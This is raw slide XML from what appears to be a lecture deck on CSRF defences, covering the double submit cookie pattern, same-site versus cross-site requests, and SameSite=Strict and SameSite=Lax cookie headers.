              <a:rPr lang="en-US" altLang="en-US" sz="200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F50A5351-B1C4-CD41-B5EB-9BDF9E814AA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Double Submit Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97283" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AAF5361-C934-7A43-A0ED-A9702B44AFB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="1905000"/>
            <a:ext cx="8988425" cy="3490913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A site can set a CSRF token as a cookie, and also insert it as a hidden field in each HTML form sent to the client. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When the form is submitted, the site can check that the cookie token matches the form token. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The same-origin policy prevents an attacker from reading or setting cookies on the target domain, so they cannot put a valid token in their crafted form</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDDFE5EE-365F-E845-A0E0-537BC139198F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="5721350"/>
            <a:ext cx="6858000" cy="1384300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>The advantage of this technique over the Synchronizer pattern is that the token does not need to be stored on the server.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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4547AFC0-A1A6-494A-A2C2-2CAD269AA97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="1143000"/>
            <a:ext cx="8991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3600"/>
              <a:t>If the user is on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" b="1"/>
              <a:t>www.web.dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600"/>
              <a:t> and requests an image from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" b="1"/>
              <a:t>static.web.dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600"/>
              <a:t> then that is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" u="sng"/>
              <a:t>same-site request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600"/>
              <a:t>If the user is on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" b="1"/>
              <a:t>your-project.github.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600"/>
              <a:t> and requests an image from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" b="1"/>
              <a:t>my-project.github.io</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600"/>
              <a:t> that's a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600" u="sng"/>
              <a:t>cross-site request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3600"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99331" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94BFB1F9-6543-804A-BF67-426668A974F2}"/>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AE9A04B4-0068-C645-B516-3193CAEF1D56}"/>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
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1299E6F-9C0A-1543-9139-7E261980445C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1295400"/>
            <a:ext cx="7918450" cy="3074988"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instruct browsers to control whether cookies are sent along with the request initiated by third party websites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It consists of adding just one instruction to the cookie.  Simply adding '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=Lax' or '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=Strict' is enough!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100356" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{401EBEE5-6567-3340-A0A2-BB14BB325E5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="4879975"/>
            <a:ext cx="8686800" cy="830263"/>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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CookieName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CookieValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=Lax;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CookieName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CookieValue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SameSite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=Strict;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"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1076B75E-8D11-9D4D-918D-22B7676C8973}"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="102403" name="Picture 2" descr="This block diagram explains how cross-site cookie requests work">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87AA8D79-D098-AC46-8879-BDC38A70F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1219200"/>
            <a:ext cx="9405938"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AA6F618-61E8-8149-B902-3FE283EB51FF}"/>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
        <p:nvSpPr>
          <p:cNvPr id="104451" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDE83E3D-614D-1448-B612-D8CAA91A3551}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1295400"/>
            <a:ext cx="7918450" cy="6065838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Strict</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: When the SameSite attribute is set as Strict, the cookie will not be sent along with requests initiated by third party websites.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Setting a cookie as Strict can affect browsing experience negatively. For example, if you click on a link that points to a Facebook profile page, and if Facebook.com has set its cookie as SameSite=Strict, you cannot continue navigation on Facebook (view the Facebook page) unless you log in to Facebook again. The reason for this is because Facebook`s cookie was not sent by this request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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18D408E4-7E1E-9D44-B747-2ECC74BBB35B}"/>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
        <p:nvSpPr>
          <p:cNvPr id="106499" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6673D27A-BA9D-0C4D-B4F2-8998B022D530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="698500" y="6629400"/>
            <a:ext cx="8686800" cy="830263"/>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br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie: CookieName=CookieValue; SameSite=Strict;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="106500" name="Picture 2" descr="https://www.netsparker.com/statics/img/webo/same-site-cookie-diagram-2.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DE146F8-ACBB-F14D-9974-19513C137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3" y="1524000"/>
            <a:ext cx="9644062"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0363FA27-9FDA-AD41-86DA-CFC0F1F6F8CD}"/>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
        <p:nvSpPr>
          <p:cNvPr id="108547" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A2406BB-8C16-A749-92F0-11E558DC802A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1295400"/>
            <a:ext cx="7918450" cy="2659063"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: When you set a cookie' SameSite attribute to Lax, the cookie will be sent along with the GET request initiated by third party website.(More info below)</a:t>
            </a:r>
          </a:p>
          <a:p>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
        <p:nvSpPr>
          <p:cNvPr id="108548" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A38F1F5A-B436-3742-9F79-80BA3AEEAB23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1085850" y="3132138"/>
            <a:ext cx="8686800" cy="83026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400">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie: CookieName=CookieValue; SameSite=Lax;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108549" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C878E9B-36A0-E743-9B8B-A9FC37EF7814}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1085850" y="4191000"/>
            <a:ext cx="7543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800"/>
              <a:t>The important point here is that, to send a cookie with a GET request, GET request being made must cause a top level navigation. Only in this way, the cookie set as LAX will be sent.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9ADB35E3-15B9-1E49-9604-03288F88FF1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234950" y="203200"/>
            <a:ext cx="3235325"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265" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>H</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>dd</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="298" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="155" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>fi</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="110" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="44" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3100" spc="-221" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>s</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1)</a:t>
            </a:r>
            <a:endParaRPr sz="3100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="object 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10FED546-2A93-6E4F-969E-74C22DB170DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="674688" y="1501775"/>
            <a:ext cx="8704262" cy="444500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T1" fmla="*/ 0 h 198755"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T3" fmla="*/ 786758863 h 198755"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T6" fmla="*/ 0 w 3989704"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T8" fmla="*/ 0 w 3989704"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T15" fmla="*/ 2147483646 h 198755"/>
              <a:gd name="T16" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T17" fmla="*/ 0 h 1987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89704" h="198755">
                <a:moveTo>
                  <a:pt x="3938835" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="41306" y="896"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7787" y="23852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="50791"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="198357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3989645" y="198357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3988748" y="41293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3965786" y="7786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="393883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0" name="object 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB8C6644-ABCF-3046-BD13-D344AFE077FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
